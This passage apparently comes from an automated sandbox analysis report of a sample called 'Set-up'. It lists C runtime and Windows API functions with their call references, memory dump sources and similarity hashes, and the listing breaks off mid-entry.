                                                                                              • API ID: DecrementInterlocked___free_lc_time_calloc_crtfree
                                                                                              • String ID:
                                                                                              • API String ID: 1841316378-0
                                                                                              • Opcode ID: 68d03d9b632b690e71807e630ed356174e354ace1853671912edfe39ba934e4e
                                                                                              • Instruction ID: e492c6d49b7ac66c3d48f385846a00230ce0875d36d24baf96d33de4065583ab
                                                                                              • Opcode Fuzzy Hash: 68d03d9b632b690e71807e630ed356174e354ace1853671912edfe39ba934e4e
                                                                                              • Instruction Fuzzy Hash: 1601A9326093916FD3146B759C81B6E77EDD7827A8F180439E519D7240FBBDDC414361
                                                                                              Function 6BB73DD5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(00000000,00000000), ref: 6BB8AA85
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000), ref: 6BB8AA90
                                                                                              • _errno.MSVCR100(00000000,00000000,00000000), ref: 6BB8AA99
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000), ref: 6BB8AAA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: dadaf8a595f0c1cbaa57641133ffbf19a09de834fc34bf6b7a23a5bd6981d78f
                                                                                              • Instruction ID: 8702b0e39dbe4a703d1afc9dc7ff3106347c80c6484763d3bedcf00884c3fd60
                                                                                              • Opcode Fuzzy Hash: dadaf8a595f0c1cbaa57641133ffbf19a09de834fc34bf6b7a23a5bd6981d78f
                                                                                              • Instruction Fuzzy Hash: BE11C0309142E99BDB25AF34C4847AD7BE0EF41718F1085A9C4226A1C0EB7D9A81CFD0
                                                                                              Function 6BBA0A85 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6BBA0376: TlsGetValue.KERNEL32(6BB96C15,6BB95BAE,?,?,?,6BB95B14,?), ref: 6BBA037C
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AAB
                                                                                                • Part of subcall function 6BB9816F: std::exception::exception.LIBCMT(?,00000000,?,?,6BBA0AB0,?,00000000), ref: 6BB98183
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFFD4,?,00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AB9
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BBA0AD4
                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BBA0AFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1973407479-0
                                                                                              • Opcode ID: 77472794b65bbed4ef245e23bd1de778f396599f4650991f96f2cbf21560cf3e
                                                                                              • Instruction ID: 217c815e2fd6cfd4078b3ec7e8d21ccb993662a28b7625e7eec883c070b22f82
                                                                                              • Opcode Fuzzy Hash: 77472794b65bbed4ef245e23bd1de778f396599f4650991f96f2cbf21560cf3e
                                                                                              • Instruction Fuzzy Hash: 5301F7329052946FDB16EF78CC41A5EFBF9EF45354F4100AAE06593150DB39ED01CB94
                                                                                              Function 6BB9874F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB98770
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE98), ref: 6BB98785
                                                                                              • TlsGetValue.KERNEL32(?), ref: 6BB98796
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB987AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::unsupported_os::unsupported_osCopy_strExceptionThrowValuestd::exception::_std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 3937123494-0
                                                                                              • Opcode ID: 0a49e82f3b2aeb2f62ed219b8c8b0c143dfacdcd4925aad02b159819f3148f74
                                                                                              • Instruction ID: b806ab6c0ca2c653c028d2e53506cb37ef588820bb658e5be0e9e5cf1bf65bbb
                                                                                              • Opcode Fuzzy Hash: 0a49e82f3b2aeb2f62ed219b8c8b0c143dfacdcd4925aad02b159819f3148f74
                                                                                              • Instruction Fuzzy Hash: 9501BC7A900184ABCB00FFB5EC85C8EBBB9EF4639470581B1E914A7120DB3CE904CBA0
                                                                                              Function 6BBA7EE6 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BBA7F10
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 6BBA7F1D
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BBA7F35
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,00000000,00000000), ref: 6BBA7F43
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionLastThrow
                                                                                              • String ID:
                                                                                              • API String ID: 1394060424-0
                                                                                              • Opcode ID: c12a562600303d8d57bbcf3200d018d4104d9081a6b95835baec73d6522a825e
                                                                                              • Instruction ID: 09cdcfd6cfd7a39c21ac90391c2e20278cc1187ff115206ec31538adb32d8c59
                                                                                              • Opcode Fuzzy Hash: c12a562600303d8d57bbcf3200d018d4104d9081a6b95835baec73d6522a825e
                                                                                              • Instruction Fuzzy Hash: EB017CB1804745AFD720AF6ACCC592BFAECFB04244794497DE0AAC2540D779E908CBA1
                                                                                              Function 6BB98C86 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6BBA0376: TlsGetValue.KERNEL32(6BB96C15,6BB95BAE,?,?,?,6BB95B14,?), ref: 6BBA037C
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB98CD8
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB98CEA
                                                                                                • Part of subcall function 6BB96B4E: _memset.LIBCMT(?,00000000,0000003E,00000002,6BBA0AF2), ref: 6BB96B6D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEEC), ref: 6BB98CF8
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB98D00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::unsupported_os::unsupported_os$EventExceptionThrowValue_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3607046972-0
                                                                                              • Opcode ID: e27a7c3facf16a9cf697eb9b4a31312b824e83e0d3b949eaab1d6f11290acd42
                                                                                              • Instruction ID: e0ed56baaaed507d084db2dfa21cd62c0acd481110ea5b042156c5227c52a5db
                                                                                              • Opcode Fuzzy Hash: e27a7c3facf16a9cf697eb9b4a31312b824e83e0d3b949eaab1d6f11290acd42
                                                                                              • Instruction Fuzzy Hash: 7E01F770802680ABDB10B738EC05E9E77BAEB43354F1445BAD876D21E0DFB9E905C751
                                                                                              Function 6BB97DE5 Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6BB97E0C
                                                                                                • Part of subcall function 6BB97406: CreateTimerQueue.KERNEL32(ECA782CA,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
                                                                                                • Part of subcall function 6BB97406: std::exception::exception.LIBCMT(6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB97487
                                                                                                • Part of subcall function 6BB97406: _CxxThrowException.MSVCR100(ECA782CA,6BB6BDD8,6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB9749C
                                                                                              • GetLastError.KERNEL32 ref: 6BB97E19
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6BB97E2B
                                                                                              • DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6BB97E31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 3155262267-0
                                                                                              • Opcode ID: 34e276442b4c94b10a126556b3bec79ac9685313b80e704bc0c28c859f1e7471
                                                                                              • Instruction ID: 08373a3bbb4ff90c255582cb8195dac05a951727f787db874989d942f802611b
                                                                                              • Opcode Fuzzy Hash: 34e276442b4c94b10a126556b3bec79ac9685313b80e704bc0c28c859f1e7471
                                                                                              • Instruction Fuzzy Hash: F601D132210A80DBD7246F26EC85F2B73ECEB43721F114578E55287280DBA9EC058AA2
                                                                                              Function 6BB75B46 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strlen.LIBCMT(00000001,?,00000000,00000000,?,6BBACA68,?,00000000,00000001,6BC06CD0), ref: 6BB75B5C
                                                                                              • malloc.MSVCR100(00000001,00000001,?,00000000,00000000,?,6BBACA68,?,00000000,00000001,6BC06CD0), ref: 6BB75B65
                                                                                                • Part of subcall function 6BB60233: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BB60CEA,00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7), ref: 6BB60263
                                                                                              • strcpy_s.MSVCR100(00000000,00000001,00000001,?,00000000,00000000,?,6BBACA68,?,00000000,00000001,6BC06CD0), ref: 6BB75B77
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,00000001,6BC06CD0), ref: 6BB89624
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap__invoke_watson_strlenmallocstrcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2148476615-0
                                                                                              • Opcode ID: f51a26993abf4da8e1a4fee8cda051f0ad1970d8c374e1880202262cd7a37b5d
                                                                                              • Instruction ID: e525dfd4e8611400bec349607895078819e4a4dfe477ffac034e358bbd78c275
                                                                                              • Opcode Fuzzy Hash: f51a26993abf4da8e1a4fee8cda051f0ad1970d8c374e1880202262cd7a37b5d
                                                                                              • Instruction Fuzzy Hash: 29F0E2332080957F9B101DB5AC8489F7B59DE896E43111834E70992001EB2EE81182E0
                                                                                              Function 6BBAB44C Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBAB453
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB474
                                                                                              • _memset.LIBCMT(00000000,00000000,00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB485
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000100,00000000,00000000,00000100,00000000,6BB9686B,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBAB4B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_memset
                                                                                              • String ID:
                                                                                              • API String ID: 2828583354-0
                                                                                              • Opcode ID: b73935e1ff5f72309c5baf8e443cae1eb6b09ac99b52775f1078ee8f28aa70aa
                                                                                              • Instruction ID: 7ab29638e6404747789fa9900cc9b8d06778492ce5c49365f2281220321dce0a
                                                                                              • Opcode Fuzzy Hash: b73935e1ff5f72309c5baf8e443cae1eb6b09ac99b52775f1078ee8f28aa70aa
                                                                                              • Instruction Fuzzy Hash: 7811B3B1901B818FD3619F2A858125AFBF4FF18744F50482ED1DA8BB50D3B8A940CF81
                                                                                              Function 6BB64E90 Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(6BB64EF0,0000000C,6BB89FD5,?,?,6BB69233,?), ref: 6BB64E9C
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB64EB3
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                                • Part of subcall function 6BB64F0C: _unlock.MSVCR100(0000000C,6BB64EDD), ref: 6BB64F0E
                                                                                              • _getptd.MSVCR100 ref: 6BB90771
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _getptd$CriticalEnterSection_lock_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 2319614578-0
                                                                                              • Opcode ID: f9807c7d9550d892b6b22f0892d9f23124c82e5bedd81cc0fd94688440efaac6
                                                                                              • Instruction ID: 698b5c40933a6886e6dd37475ca407c1617911c26730ba3356224681f46fb95e
                                                                                              • Opcode Fuzzy Hash: f9807c7d9550d892b6b22f0892d9f23124c82e5bedd81cc0fd94688440efaac6
                                                                                              • Instruction Fuzzy Hash: D4012632909AD0EBDB14AB789842F0D33E0EF427E8F504299D414A7590FB7DCE41CE51
                                                                                              Function 6BB73567 Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • free.MSVCR100(?,?,?,?,?), ref: 6BB735BB
                                                                                                • Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164
                                                                                              • free.MSVCR100(?,?,?,?,?,?), ref: 6BB735C3
                                                                                              • _errno.MSVCR100 ref: 6BB8831F
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8832A
                                                                                                • Part of subcall function 6BB733B8: _wcslen.LIBCMT(?), ref: 6BB7340B
                                                                                                • Part of subcall function 6BB7373E: _memset.LIBCMT(?,00000000,00000044), ref: 6BB73786
                                                                                                • Part of subcall function 6BB7373E: _calloc_crt.MSVCR100(?,00000001), ref: 6BB737E4
                                                                                                • Part of subcall function 6BB7373E: __doserrno.MSVCR100 ref: 6BB7384A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$FreeHeap__doserrno_calloc_crt_errno_invalid_parameter_noinfo_memset_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1030453172-0
                                                                                              • Opcode ID: 91a7d71734837c5b8f8d16bab574b0639bdf106c428656ce29e236cd97c71266
                                                                                              • Instruction ID: 12303609964cd5297af795e3af27fae39d267c23d46f77d337541cba8bd67600
                                                                                              • Opcode Fuzzy Hash: 91a7d71734837c5b8f8d16bab574b0639bdf106c428656ce29e236cd97c71266
                                                                                              • Instruction Fuzzy Hash: FA011D76800188BBCF125FA5CC01ADE7B79EF04368F5042A0B924651B0E779CA61DB90
                                                                                              Function 6BB6BBB9 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BB6BBC0
                                                                                              • __AdjustPointer.MSVCR100(00000000,?,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB6BBEF
                                                                                              • __AdjustPointer.MSVCR100(00000000,?,00000001,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB871EB
                                                                                              • memcpy.MSVCR100(?,00000000,00000003,00000004,6BB6BCE1,00000000,?,?,?), ref: 6BB87211
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 738859832-0
                                                                                              • Opcode ID: cbad7988759129df928cac1b685f461189e4a5b82f1e954310a3c75f88a7b1ef
                                                                                              • Instruction ID: ebb33f89ce92d365641325ee3f81b20d653cb89bfc731d5e89e8a4b59f2ff65b
                                                                                              • Opcode Fuzzy Hash: cbad7988759129df928cac1b685f461189e4a5b82f1e954310a3c75f88a7b1ef
                                                                                              • Instruction Fuzzy Hash: 92014F72404684AAEF229F21DC03F9E3BB5EF05398F104415F95459070EBBAAEA5DA50
                                                                                              Function 6BB71201 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32(00000000,6BB9085F,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71204
                                                                                              • _malloc_crt.MSVCR100(00000002,?,?,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71233
                                                                                              • memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB71242
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB7124B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free_malloc_crtmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 202606007-0
                                                                                              • Opcode ID: 3d8e4e0cce1d97ce2b8cd0a003d3587e1f6e30a4fa9e95e8020e9bd42ea9849e
                                                                                              • Instruction ID: a7f0424db8e463cd3681516d00c71fe451e478a89879ed8832e91c2b1143aea5
                                                                                              • Opcode Fuzzy Hash: 3d8e4e0cce1d97ce2b8cd0a003d3587e1f6e30a4fa9e95e8020e9bd42ea9849e
                                                                                              • Instruction Fuzzy Hash: 28F0827B9059B06A8B317F35BC5589B2738EEC225431E04A6E412D3145FA69CE8183B2
                                                                                              Function 6BBA1664 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA1680
                                                                                              • _memset.LIBCMT(?,00000000,00000000,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152), ref: 6BBA16A1
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002,?), ref: 6BBA16AC
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,?,6BBA1550,?,6BBA16DB,?,?,?,6BBA1514,?,?,6BBA129E,?,6BBA1152,00000002), ref: 6BBA16B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$_memset
                                                                                              • String ID:
                                                                                              • API String ID: 1722558631-0
                                                                                              • Opcode ID: 183182e7c4c582595b499faec1afdc5ad71ddb1a62ef8726871f1a58754acb8a
                                                                                              • Instruction ID: 77c793859e16a4661a3ce1fcfb0459a8cb7f5353bd3f5d929f2e7aa323fb4737
                                                                                              • Opcode Fuzzy Hash: 183182e7c4c582595b499faec1afdc5ad71ddb1a62ef8726871f1a58754acb8a
                                                                                              • Instruction Fuzzy Hash: A2F0B4726087519BD3218E2EEC81A0B73E8FF81794B68483CF0D8C7160DB38ED82CA14
                                                                                              Function 6BBAAC51 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,-00000018,6BBA0ED5,00010000,?), ref: 6BBAAC8D
